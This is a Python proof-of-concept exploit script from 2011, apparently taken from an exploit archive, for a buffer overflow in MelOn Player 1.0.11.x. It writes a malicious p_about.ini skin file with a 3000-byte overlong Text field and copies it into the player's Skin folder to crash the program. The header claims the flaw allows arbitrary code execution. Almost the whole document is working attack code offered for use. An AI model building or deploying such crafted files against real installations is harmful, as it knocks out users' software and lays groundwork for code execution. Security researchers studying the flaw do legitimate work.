197 lines
No EOL
4.1 KiB
Python
Executable file
197 lines
No EOL
4.1 KiB
Python
Executable file
# Exploit Title: MelOn Player 1.0.11.x Denial of Service POC
|
|
# Date: 09/09/2011
|
|
# Author: modpr0be
|
|
# Software Link: http://www.melon.co.id/cs/guide/download/player.do
|
|
# Vulnerable version: 1.0.11.x
|
|
# Tested on: Windows XP SP3 (VirtualBox 4.1.0 r73009)
|
|
# CVE : N/A
|
|
# Thanks: offsec, exploit-db, corelan-team, 5M7X, loneferret, mr_me, _sinner
|
|
|
|
#### Software description:
|
|
# Melon Player is a famous software in Indonesia to play songs that are provided by
|
|
# the Melon portal (http://www.melon.co.id). This software can play any music
|
|
# file types such as mp3, wav, wma, mp4, and others. This player can also play
|
|
# the files on your local computer or by online streaming to the portal Melon.
|
|
# The songs can also be downloaded to your local computer.
|
|
#
|
|
#### Vulnerable information:
|
|
# The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability
|
|
# when opening p_about.ini file (Note: Actually, p_about.ini is a configuration file
|
|
# as part of skin template. This file will bring the program information and can be
|
|
# accessed on the menu (Menu → Information)), as a result of adding extra bytes to
|
|
# parts of the file (Text section), giving the attackers possibility to run an arbitrary
|
|
# code execution on the system that install Melon Player.
|
|
#
|
|
### Some Conditions:
|
|
# This is just the POC, it will just crash the program.
|
|
# and it's unicode ;)
|
|
#
|
|
##
|
|
|
|
#!/usr/bin/python
|
|
|
|
import os,sys,shutil,time
|
|
|
|
header=("""[MAIN]
|
|
MainStyle=SKIN
|
|
Resize=NO
|
|
Mask=YES
|
|
BGStyle=IMAGE
|
|
DefSize=0,0,427,136
|
|
Image=skin.bmp
|
|
Button=2
|
|
Slider=
|
|
Static=1
|
|
Text=4
|
|
Edit=
|
|
Combo=
|
|
|
|
|
|
[MAINBG]
|
|
TopLeft=145,389,6,21
|
|
TopCenter=153,389,11,21
|
|
TopRight=166,389,6,21
|
|
MiddleLeft=145,412,6,21
|
|
MiddleCenter=153,412,11,21
|
|
MiddleRight=166,412,6,21
|
|
BottomLeft=145,435,6,34
|
|
BottomCenter=153,435,11,34
|
|
BottomRight=166,435,6,34
|
|
|
|
[MAINMASK]
|
|
TopLeft=174,389,10,10
|
|
TopCenter=185,389,10,10
|
|
TopRight=196,389,10,10
|
|
MiddleLeft=185,389,10,10
|
|
MiddleCenter=185,389,10,10
|
|
MiddleRight=185,389,10,10
|
|
BottomLeft=174,400,10,10
|
|
BottomCenter=185,389,10,10
|
|
BottomRight=196,400,10,10
|
|
|
|
|
|
[BUTTON_1]
|
|
Name=??
|
|
ID=1001
|
|
ResizeStyle=TOP_LEFT
|
|
Tooltip=
|
|
CheckBox=FALSE
|
|
Position=410,4,13,13
|
|
NormalRect=223,389,13,13
|
|
OverRect=238,389,13,13
|
|
DownRect=253,389,13,13
|
|
DisabledRect=223,389,13,13
|
|
MaskRect=2000,0,13,13
|
|
|
|
[BUTTON_2]
|
|
Name=??
|
|
ID=1002
|
|
ResizeStyle=TOP_LEFT
|
|
Tooltip=
|
|
CheckBox=FALSE
|
|
Position=173,105,80,20
|
|
NormalRect=0,763,80,20
|
|
OverRect=0,763,80,20
|
|
DownRect=81,763,80,20
|
|
DisabledRect=162,763,80,20
|
|
MaskRect=2000,0,80,20
|
|
|
|
|
|
[STATIC_1]
|
|
Name=???_??
|
|
ID=2001
|
|
Position=20,31,72,84
|
|
TopLeft=14,478,72,84
|
|
TopCenter=
|
|
TopRight=
|
|
MiddleLeft=
|
|
MiddleCenter=
|
|
MiddleRight=
|
|
BottomLeft=
|
|
BottomCenter=
|
|
BottomRight=
|
|
|
|
|
|
[TEXT_1]
|
|
Name=popup Name sdw
|
|
ID=3701
|
|
Position=2,2,420,14
|
|
Text=MelOn Player
|
|
Font=Arial
|
|
FontSize=12
|
|
FontBold=
|
|
Align=CENTER
|
|
FontColor=0,0,0
|
|
""")
|
|
|
|
footer=("""
|
|
[TEXT_3]
|
|
Name=????
|
|
ID=3703
|
|
Position=104,50,243,14
|
|
Text=Melon Player Version 1.0.0.101102
|
|
Font=Arial
|
|
FontSize=12
|
|
FontBold=
|
|
Align=
|
|
FontColor=0,0,0
|
|
|
|
[TEXT_4]
|
|
Name=Copyright
|
|
ID=3704
|
|
Position=104,72,303,14
|
|
Text=Copyright PT. Melon Indonesia. All Right Reserved.
|
|
Font=Arial
|
|
FontSize=12
|
|
FontBold=
|
|
Align=
|
|
FontColor=0,0,0
|
|
""")
|
|
|
|
filename="p_about.ini"
|
|
splash=os.path.abspath(filename)
|
|
skindir="C:\Program Files\MelonPlayerID\Skin"
|
|
|
|
junk = "A" * 3000
|
|
|
|
buggy=("""
|
|
[TEXT_2]
|
|
Name=popup Name
|
|
ID=3702
|
|
Position=3,3,420,14
|
|
Text="""+junk+ """
|
|
Font=Arial
|
|
FontSize=12
|
|
FontBold=
|
|
Align=CENTER
|
|
FontColor=170,170,170\r\n""")
|
|
|
|
banner=("""
|
|
[*] MelOnPlayer 1.0.11.x Denial of Service POC
|
|
[*] modpr0be[at]spentera[dot]com.
|
|
[*] thanks a lot: cyb3r.anbu | otoy :)
|
|
=====================================================
|
|
""")
|
|
|
|
file=open(filename,'w')
|
|
if os.name == 'nt':
|
|
if os.path.isdir(skindir):
|
|
try:
|
|
file.write(header+buggy+footer)
|
|
print banner
|
|
print "[*] Creating the malicious .ini file.."
|
|
time.sleep(2)
|
|
print "[*] Malicious file (POC)",filename,"created.."
|
|
print "[*] Path:",splash
|
|
file.close()
|
|
shutil.copy2(splash,skindir)
|
|
print "[*] File",filename,"has been copied to",skindir
|
|
except IOError:
|
|
print "[-] Could not write to destination folder, check permission.."
|
|
sys.exit()
|
|
else:
|
|
print "[-] Could not find Skin directory, is MelOn Player installed?"
|
|
sys.exit()
|
|
else:
|
|
print "[-] Please run this script on Windows."
|
|
sys.exit() |